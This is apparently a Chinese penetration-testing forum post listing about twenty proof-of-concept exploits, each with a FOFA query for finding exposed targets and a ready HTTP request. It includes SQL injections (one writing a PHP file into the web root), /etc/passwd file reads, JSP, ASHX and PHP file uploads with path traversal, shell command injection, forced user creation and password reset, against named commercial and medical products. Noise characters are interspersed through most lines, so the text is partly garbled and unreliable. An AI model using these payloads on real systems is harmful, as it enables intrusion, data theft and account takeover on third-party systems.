/ |+ b+ x, J  X5 ]9 k- ^! I2 [% G) Y

# Z. f- |0 W  {* ~5 U  @- y184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加) U" M+ d" ?. B0 q% h: W. |
FOFA:server="SunFull-Webs"' B4 d! G# a' x1 \
POST /soap/AddUser HTTP/1.1
1 c& P& s# r* |0 d) N' iHost: your-ip6 J, L3 H5 u1 q7 }3 `
Accept-Encoding: gzip, deflate1 T& m) ?3 K" @* f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
! I' T8 [8 L9 C! j0 T3 a# \Accept: application/xml, text/xml, */*; q=0.01
# {& \( Y* T: p3 u& r% AContent-Type: text/xml; charset=utf-8
' w- K- \, F3 O4 u8 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* v* i) R- t9 B! {- BX-Requested-With: XMLHttpRequest
# O' u* z* m5 A  f8 q  u% i) a* U& `+ _

0 \2 ~- c' n, C  Z/ H* jinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')1 \! H3 ]' _) e- X3 f+ Z2 k7 p

0 j8 X/ i/ D7 t! C
# J" ^' Z$ k/ X1 c185. 瑞友天翼应用虚拟化系统SQL注入2 J- ?4 ~% ~  }2 t. _/ W& p
version < 7.0.5.14 t1 F) h; }' r  J) F2 Y# _
FOFA:app="REALOR-天翼应用虚拟化系统"3 Y6 R4 x" N3 t- e
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
& `+ G5 y& R* c6 Y6 f2 {1 UHost: host: R; @4 i* o8 q# _
% `8 y3 H' m8 E1 S8 G
) O, Z( d' ^$ t
186. F-logic DataCube3 SQL注入5 o* Q4 Y5 O) p9 s5 H
CVE-2024-31750
3 ^$ F2 W) [2 N! D; SF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统* }- \( }1 ]* D4 p  d, }8 Y& n
FOFA:title=="DataCube3"
5 Z4 @+ {  w" v& n3 W0 }: H6 ^POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
8 X8 i8 [; b  }8 ~( p0 GHost: your-ip
* w! E# m# T) K( j. H% w' oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.03 J8 |$ C4 q$ ~+ p# ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
9 T1 X" k7 j" S: q! E0 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( @( v' b' Q) r! I7 {* NAccept-Encoding: gzip, deflate
% M/ L$ ^# d5 {! H# {Connection: close1 }7 x& |6 k: F- |1 ^" p
Content-Type: application/x-www-form-urlencoded
+ a( K# F/ g- {+ g, c' T- P1 I+ f
1 B: A1 G" L- J. f# K8 h3 Qreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14506 J) D  D% z' u" @8 K! E% v
; X* ^! n' y8 v

% o( @( Z0 R2 y- l/ d* O- Z187. Mura CMS processAsyncObject SQL注入# t" ?4 h+ P( H7 U4 V% A5 U$ Z
CVE-2024-32640
3 H  ^6 {0 v% g# _FOFA:"Mura CMS"
4 ^" D7 h9 `" k# x2 pPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
, n0 G! c/ l  F% THost: your-ip
: B, T2 H% ~+ j# ?" q$ R& C) Z( LContent-Type: application/x-www-form-urlencoded( V* S2 c+ l4 U" D& [0 n& M

. K& R" M& E9 E; |# T( R& u4 }7 G6 H+ v: C- p7 k
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
) `7 N6 Y" y+ H
& x4 d9 j  n/ h8 g$ @( m: B! w9 B1 l5 ?9 R, P9 l
188. 叁体-佳会视频会议 attachment 任意文件读取. T1 b- d# J9 V# Y* x# T. O6 @
version <= 3.9.7
, b, N2 g  h. f% M& m# z: h% F4 |FOFA:body="/system/get_rtc_user_defined_info?site_id"
* S1 C" ?& t% u, f! ^2 G2 PGET /attachment?file=/etc/passwd HTTP/1.1
& H( o# V* F) c/ |$ O$ gHost: your-ip( R! @/ e# {0 c- @8 ^( J8 l3 b- Y7 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 w  R9 W6 K6 D7 u* r) Y$ m) a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ {6 T* F) e9 i2 v) Y8 H' }
Accept-Encoding: gzip, deflate9 a7 G0 `& O' s8 C8 f( T. v
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 j# ]9 t8 h; _5 Z" O! u3 QConnection: close
+ W, S& S3 l4 l. w( b( O
! p$ I  E% a! P/ J; C$ p* p
& E; G" q9 z9 n+ p1 I; Z189. 蓝网科技临床浏览系统 deleteStudy SQL注入
, f, h6 x7 m' b/ f0 y2 n. y3 @; hFOFA:app="LANWON-临床浏览系统"
- Y' y  k' {0 h0 Z7 ]GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
' y1 b! _3 N5 [) bHost: your-ip! d, ~- E- K# {# G. _
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.366 G; A; u! X; Y. Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% {7 r) `% Q" n! H. `/ T8 cAccept-Encoding: gzip, deflate
6 n% K( C9 }/ t  G8 y* o+ bAccept-Language: zh-CN,zh;q=0.9
. X- e) I/ o9 |6 OConnection: close' T2 L. Z0 u" X( {3 |

: F, F3 ^, |$ {; ^+ n# K3 N! t# T: E& W1 C3 R, s
190. 短视频矩阵营销系统 poihuoqu 任意文件读取# D/ u' R/ r. T9 Q% i4 c! ?# T
FOFA:title=="短视频矩阵营销系统"0 i5 N/ {  c; ^5 M& B3 M" C
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
; ]5 ^% W- a/ YHost: your-ip
/ @8 p6 d7 b3 m9 \1 _$ E, @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36+ z3 q* U' l+ P6 o9 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) N- O3 F* K; MContent-Type: application/x-www-form-urlencoded$ c/ J. S, |7 a( N+ h. ^2 t
Accept-Encoding: gzip, deflate. ?& l1 t. c/ A- j% Q* R
Accept-Language: zh-CN,zh;q=0.9
4 B7 e# y6 B+ e7 G/ u& }# K" U
3 n+ [% h' c3 W( [- Cpoi=file:///etc/passwd
2 ^$ Y, ~! X) _& g8 Y5 Z' C' [! }9 h6 G% ]

2 d* [7 {' ~" B; Q1 c191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
% a3 \3 |" U) v) a/ Q( R. y$ a2 p4 xFOFA:body="/CDGServer3/index.jsp"7 L1 M& G- m; W% y& _
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
3 ^" _. @! A5 n, wHost: your-ip
( z- M5 _, g; t" g3 W; CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 g8 N0 a# e% S) f1 ]6 V0 gContent-Type: application/x-www-form-urlencoded. `' Y/ ^" A1 ~

) O/ q1 s7 E# C( s. a9 f* T3 m: wcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
3 v% K- j7 x( u  u9 |9 ^
8 D+ s$ ^5 |' @$ ]! W8 I
" l8 C4 \8 F4 D$ _' r0 k" n192. 富通天下外贸ERP UploadEmailAttr 任意文件上传, s0 g0 e  X* n$ W% r9 O
FOFA:title="用户登录_富通天下外贸ERP"
6 ^7 m" ?" B5 `% q( ]) `8 ~POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.10 S9 G8 l6 A- L2 i
Host: your-ip& X. h9 P5 H0 r: r) O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) `- {! k4 ~. R' p& hContent-Type: application/x-www-form-urlencoded8 }& l6 q( i8 [
+ ?- g. z. s6 q  s: L

# o, t' ^4 B( ~/ z<% @ webhandler language="C#" class="AverageHandler" %>
( s3 V5 @2 a/ X* S! {using System;/ A5 Y+ p4 b* E, `  w0 B
using System.Web;- O! m+ w8 U, c8 V- c& F' n5 V+ ^
public class AverageHandler : IHttpHandler
+ I2 O7 F2 Z$ f$ a! M$ @{+ a  W+ t$ _9 _
public bool IsReusable* X  O9 C* h& S+ G  ~
{ get { return true; } }1 M& H+ K7 n0 {6 T* W% m' p
public void ProcessRequest(HttpContext ctx)5 U; C$ D0 N6 V( y$ U4 [4 @+ G
{
9 T7 n" A- U% Wctx.Response.Write("test");6 W5 T5 l/ j8 J. ~
}: X9 V, I3 j/ F+ B% a
}
# `7 E0 P$ m* V. f1 l# I7 H/ j5 o6 k+ A; f* m# F( J( L

* l+ d# b2 r7 @2 ?6 _* e193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
: p' h  c4 ?$ pFOFA:body="山石云鉴主机安全管理系统"; {8 E) H+ W" S, `
GET /master/ajaxActions/getTokenAction.php HTTP/1.10 n" e% c/ X! n6 D
Host:
" d3 U3 B7 f0 [1 ~- N+ `" B! bCookie: PHPSESSID=2333333333333;
& [1 g4 \7 Y/ N8 b3 Z- B% y: TContent-Type: application/x-www-form-urlencoded4 y$ B8 y; o! N
User-Agent: Mozilla/5.06 k# Y" M5 s1 L

4 O2 q8 m5 f* ^' U3 {3 R) ~: C
$ f# l. z! R3 R% k% K, KPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1% }- ~$ Z/ d3 A% e; ~0 |' z; e
Host:) k' R& T, g; R: P  {4 y  h& r
User-Agent: Mozilla/5.0, P& g2 v1 r# b: L' j
Accept-Encoding: gzip, deflate
5 k: k9 E5 k: {0 HAccept: */*
; y9 I9 [" ?# ?+ E( L" Z3 zConnection: close
* m2 s  D4 f$ B. _1 \Cookie: PHPSESSID=2333333333333;9 j! _& l' z9 p' m# J* W1 K
Content-Type: application/x-www-form-urlencoded" M+ J# n/ C% K/ `+ }# Q' J! s
Content-Length: 84
' A) E8 y( s+ M5 k0 F0 h( D
  G" s5 W; A4 [7 Vparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
2 X* \" p, \8 W5 d. N, a' B; j* G. y+ m4 b! Z# j2 V8 }2 w' O. }/ j

# ?1 v8 _: T; O' e& AGET /master/img/config HTTP/1.1' ^) C0 q& T+ I$ W! J- d( x
Host:
- }0 [* ~$ x# x3 G8 o6 [# R$ _( YUser-Agent: Mozilla/5.0. w2 A5 m& E! q* J3 _5 r5 L" |& Z
  R+ F, k& v( Y" c8 z; h5 `' k

/ }0 g, j" \6 w' c194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传5 b) B) i$ x  p
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在6 k( k7 I+ ]" w& d/ ]

- v# U, f; T. }8 pPOST /servlet/uploadAttachmentServlet HTTP/1.1
! V: L2 y( u/ N4 bHost: host% D+ {2 f" j3 B4 o" M" o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
: a$ B8 I  K% y1 f/ B6 _6 _6 @7 d* xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% y0 E) O8 `2 {" i7 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 N5 O) h( d. e( _. T" ~
Accept-Encoding: gzip, deflate
- C  Y" m4 x4 M' _8 y- }! U4 vConnection: close
% H/ q; i  d+ R, y  j' u/ \Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk8 Z" q/ o0 C) X8 v+ ~
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
2 p$ g4 W/ W: D, M1 g7 J9 Q; T7 R; C) u- M4 ^. m" L/ @
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"( e7 b0 u! s' g& S! w0 U; M& ~
Content-Type: text/plain
5 o( i0 z6 l; w" G9 q<% out.println("hello");%>! V) r9 s1 H" C" M$ R8 [5 y7 ?
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
' u% C# v# ~# Y& ~0 ~6 c1 x& ^Content-Disposition: form-data; name="json"6 c. S# s7 `8 V7 z; ]5 P( G9 Z
{"iq":{"query":{"UpdateType":"mail"}}}8 p* _7 x0 S/ a* `6 ]; Y
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--8 m# e) I' Q. @! G9 r" p

+ f* d, C. B+ ]# l! F* D9 e6 U/ m9 t: b1 k3 K$ m" ~" Z
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行: V7 M: @" w4 \0 M: d3 |
FOFA:title=="飞鱼星企业级智能上网行为管理系统+ m/ L8 V- o6 `
POST /send_order.cgi?parameter=operation HTTP/1.1$ @  n2 v  ~( G" U9 [- x) T( E
Host: 127.0.0.10 c2 H% u& P1 C" l: W/ V6 B8 E
Pragma: no-cache5 q" d5 P1 i( _4 F4 M
Cache-Control: no-cache( c- T2 R6 ]  F# X5 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" m& w4 j6 @. Z5 _Accept: */** t/ A( v; T  {7 i  X4 i9 o/ y
Accept-Encoding: gzip, deflate% T9 @; R+ O" L; ^+ a( f
Accept-Language: zh-CN,zh;q=0.9# P0 W& N0 r/ t. j7 r
Connection: close
0 i* q, C$ V/ K" t  j/ BContent-Type: application/x-www-form-urlencoded7 n% r: \  ]/ y5 H: L$ q
Content-Length: 68
  @& C  ^2 Y; I' f/ o" ?$ T
5 \& u! k; F! p  l' V{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}; e  e* \, \2 w2 s+ I7 A; S9 t, b3 M
/ y3 I9 B1 _% [& ~1 w

. X4 m+ m$ S9 E$ Q196. 河南省风速科技统一认证平台密码重置
+ d7 H( L& y& ~- G* k' G* B3 yFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
6 S1 D' r- D# y0 [2 f7 \  wPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
. l) I7 M3 y1 c4 S  `, U' J+ PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) o9 O5 p6 B, _& m) \5 G/ l5 a3 ~0 G
Content-Type: application/json;charset=UTF-8! ^1 g* b$ m* S% ]! Q
X-Requested-With: XMLHttpRequest
. e' q7 |7 a9 D+ ]Host:
. l( J! @1 j& d/ f3 gAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
' d# k4 X& A9 m/ f% p  EContent-Length: 45
9 y8 }# D  c$ T! [; N7 tConnection: close
  v! U- ^/ b  Q9 a9 ~" k1 Q/ K. N/ T6 R( p
{"xgh":"test","newPass":"test666","email":""}
& ]6 i1 S& ]' _
! r' M1 |; v: O4 J# c" U4 p* G9 E1 P7 z! \* D+ t( A6 A0 P6 i
4 Q  U, ~3 u$ i, }5 |& a8 i
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
4 l( B4 X; h& @3 E& nFOFA:app="浙大恩特客户资源管理系统"
& ^# \  u3 u; l# H; D7 v5 i  ]GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
" v# u/ a4 t/ R4 @/ ZHost:: ]( t7 l* q" Z  A$ W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
- W/ H0 ]+ k+ S. }" OAccept-Encoding: gzip, deflate
: Y7 t0 Y. F$ ~! X+ b$ Q0 XConnection: close7 O, u$ P: t, O. u
1 N" W& J/ P& r9 s2 _& T
( Q/ J+ j" S* V% ~6 P: _" u
( B6 y4 z  N3 l  {- ^0 l. K/ W
198.  阿里云盘 WebDAV 命令注入* Q9 W5 [, P% J( J( }. n5 l
CVE-2024-296404 @2 s2 g: F8 |/ {3 c
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.19 k  F. N7 {* s0 @# R1 j2 C
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
5 u. `$ C9 Y6 y1 X' z9 }6 {5 RAccept: */*
7 T- c: S2 v" ]5 \8 Y: o% c" tAccept-Encoding: gzip, deflate- N% k9 D" S+ f( ]% E2 g* N; s- o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
" m4 [' h8 D; H( pConnection: close: }9 b8 t# R4 y4 I  j

% B! D8 m/ t/ r) ?$ ~8 S) I
$ a0 {8 J/ G% G- }4 O* n) B5 i199. cockpit系统assetsmanager_upload接口 文件上传3 }1 _9 y9 U8 O; R/ A, r# _

4 K- O  U0 P1 Q+ `! t3 ^. b1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
7 D! _0 g2 c* [7 Q9 _GET /auth/login?to=/ HTTP/1.1
  V: r% I: Z2 @$ ~# ~% A
2 b" f6 i) R. W  V$ e6 {响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"" D- Z# p2 s5 @: y! u

- T5 Y( Z/ J0 m3 }2.使用刚才上一步获取到的jwt获取cookie:# a9 t4 ~1 q4 O1 ^: o- i2 a8 q( g
2 f4 _7 X! C/ b$ |: W7 g
POST /auth/check HTTP/1.1
4 J1 F( }1 N& X0 d1 J9 K( F$ N, c8 dContent-Type: application/json, @8 Y9 h( e, I6 l" i6 c

& C9 O# I0 R- C" q( |{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}. ~# D7 s3 Z: g$ ~& P. @
$ p( L9 @6 X; A9 ]  y9 c
响应:200,返回值:( \6 u' r) n2 B5 ]' M8 A
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/0 H7 F4 I  |) V3 B+ s: L
Fofa:title="Authenticate Please!"& q# n$ `; z9 Y8 r
POST /assetsmanager/upload HTTP/1.1
3 x8 }8 M0 X2 V2 c$ W  iContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3- R5 F7 ~6 v6 v' s4 r" f) d6 f- u
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
% W. @  W+ g. B2 I4 ]( j' \$ e; d+ j
-----------------------------36D28FBc36bd6feE7Fb3( H; a. B2 ^# x0 T0 e
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
5 w4 u$ u8 P  ]* d' `0 v$ MContent-Type: text/php- h9 t% P% d) p( E, C+ B2 `

: W. r7 O6 l0 v! |$ G5 u0 ^" d<?php echo "tttt";unlink(__FILE__);?>0 ^( z; R, }& b4 E; O
-----------------------------36D28FBc36bd6feE7Fb3
" \" c, Q+ b5 W; w& n. G2 c& Q, _Content-Disposition: form-data; name="folder"& m4 z& c# n  u# `, j- h5 ]' l
5 x& a: p4 z0 V+ o/ Y: h$ O
-----------------------------36D28FBc36bd6feE7Fb3--; B0 N" b3 u" {8 A

" o, k6 y! b# T* E( m8 X( A( z+ p9 V5 |9 ~0 O7 @8 p# m5 u4 t
/storage/uploads/tttt.php4 W) S4 Y+ Z2 b+ `; A/ W- c

' h8 ]* o6 W! m$ o200. SeaCMS海洋影视管理系统dmku SQL注入
( D4 \1 {# N8 x% O' [  {$ VFOFA:app="海洋CMS"( h* D' A/ @  C4 M# q
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.13 H) h" U+ ?( l6 P
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
$ x0 l& W  k: P( e( _5 KUpgrade-Insecure-Requests: 1
, i* s1 c( m) x6 \% S, c3 Q8 eCache-Control: max-age=0
6 V% U7 ]! @6 R, U5 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: V9 o, W# F5 O, ~: E3 {Accept-Encoding: gzip, deflate* Y. `, W: w3 f# w- g9 E) s% N
Accept-Language: zh-CN,zh;q=0.9$ W, X8 `0 r$ @2 x( o; f9 a, C

1 h' N: W7 u8 i, |
2 a  t+ Y3 |4 U; ]& c201. 方正全媒体新闻采编系统 binary SQL注入
) W2 X! \# ~9 W% \FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
' T: q5 [9 \. l% u: R6 APOST /newsedit/newsplan/task/binary.do HTTP/1.1
  d& {( J& ]9 ]Content-Type: application/x-www-form-urlencoded
9 l- t4 }' z6 O. w5 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( ~2 q% u8 N' U
Accept-Encoding: gzip, deflate/ {& w' G( y, a% K
Accept-Language: zh-CN,zh;q=0.9
3 v( [6 k4 V. W1 a4 V1 vConnection: close1 w2 n  l5 Q; y/ V0 P' Y) ?
4 g: B* K8 X$ @6 l, H$ |8 l
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=19 U$ W3 l( X) u. s4 x: D

2 y9 i& b5 |0 b/ p* L7 @
6 q# B! _/ k; m9 Z4 I( t202. 微擎系统 AccountEdit任意文件上传( q; S* Q8 {7 P  |
FOFA:body="/Widgets/WidgetCollection/"
/ W( h8 E: x9 `3 s获取__VIEWSTATE和__EVENTVALIDATION值
5 V1 A$ N- E7 zGET /User/AccountEdit.aspx HTTP/1.1
7 Z, m' X. A4 Y% X4 |' k8 _  mHost: 滑板人之家/ h; J% v! V7 X" }/ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
; R5 x5 P8 X0 ]1 q8 M( ZContent-Length: 0
' O  P8 ^) d+ C; V" X
( \6 a1 g) _' Q' F$ Y# ?
/ T  `7 @# }  m) B6 o, |6 _' w$ x替换__VIEWSTATE和__EVENTVALIDATION值  x, O$ F  N" ?* n1 z& A- E4 w0 y2 |, W
POST /User/AccountEdit.aspx HTTP/1.1  }  O: [: ~- U1 H2 R$ B
Accept-Encoding: gzip, deflate, br
4 G* G- ~- [9 s& R  xContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
! `5 [. X1 p6 P7 D, Z$ V: i& _! t4 P* Y  a( _" z0 U
-----------------------------786435874t38587593865736587346567358735687, {; M0 |) U% N: w; R7 f2 s
Content-Disposition: form-data; name="__VIEWSTATE"
6 n( G! C1 x) ^" n3 ^( f8 p) e2 l8 D: D  L* D
__VIEWSTATE
" d7 S: x* @# y0 t& f0 y2 ?% f! V: P-----------------------------786435874t385875938657365873465673587356870 H& d1 N2 e; ~, r; G0 X2 t
Content-Disposition: form-data; name="__EVENTVALIDATION"8 u" [. k9 M# e3 @5 O
; @) r; e, p$ Y) x
__EVENTVALIDATION( K# V8 R  m6 R: @$ d( m2 U
-----------------------------786435874t38587593865736587346567358735687
: B" r1 |8 |. t  |. K5 k; S, vContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"/ }8 C$ g4 }6 J
Content-Type: text/plain
( w: T" \: u* \; T
7 c" Z, B& @: f$ @Hello World!
. Q3 b4 Z4 Y$ R) q; u-----------------------------786435874t38587593865736587346567358735687
5 q7 X( ]7 {- h, S* D' EContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"( P: r$ u& a+ E+ [( f
+ O/ l% ]( n7 l9 u  D
上传图片
$ y' b- J( J  \( Q! F. q-----------------------------786435874t385875938657365873465673587356875 P& R3 A' L( r0 _/ P2 e. s3 y
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
7 E0 k+ N  X0 P  X, z( H% J4 J) t3 \  q+ A2 C! N1 I
6 z# N$ Q  I1 Y2 R
-----------------------------786435874t38587593865736587346567358735687' v6 x: N  O9 p, k0 s, X
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"2 {" F. o$ V4 B7 U9 d$ |6 V$ ^
) ^7 I4 O: N% @/ ^2 t9 u
. z3 k( Y" W7 F2 c2 B0 ~7 m% ?: ~
-----------------------------786435874t38587593865736587346567358735687--) o' a: x) W( o

+ N8 p4 l  b) x0 q3 g( [4 |5 z
) e" _! F" B/ ~3 C# b5 }/_data/Uploads/1123.txt# \7 |# s% x9 c1 p4 e/ V

" d) B9 ^( F- j" i7 p. }# N203. 红海云EHR PtFjk 文件上传( t$ v( s' u5 I2 Q! E5 w0 Y" }- |
FOFA:body="RedseaPlatform"# H. Q! h& N5 O% l& O
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
9 r% h( }: _; L: Y" Y+ ]Host: x.x.x.x; C; L+ j- ]: h) @
Accept-Encoding: gzip& H  z9 V7 U5 j0 S, r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# c6 W0 b* a) B2 {* K2 ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4. p. h# g6 W0 T$ B. \8 _
Content-Length: 210% ?) w1 C+ o9 e1 s8 k  W
4 q1 ]! b1 Y" @- o" z' Y6 p/ `
------WebKitFormBoundaryt7WbDl1tXogoZys4: Q5 ]$ Y1 `; T3 F! |
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
6 \' _5 \. W6 I6 W1 `: s2 oContent-Type:image/jpeg- M: V4 Q2 I3 v, q, x

1 n: Z, [) N0 `+ G- J<% out.print("hello,eHR");%>3 c9 a# p% H  x" C
------WebKitFormBoundaryt7WbDl1tXogoZys4--9 X* |- _+ f7 u7 w8 w

! b& j: A. n# o% L ' d# t+ A/ `7 G% z. n% y
: B* V3 z) h( G' x
4 X4 _5 N: N' z* K+ x5 J+ ]
, J  U3 _0 Y! e( F. p
& K4 Q  K& Z7 {1 c" W6 ^



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2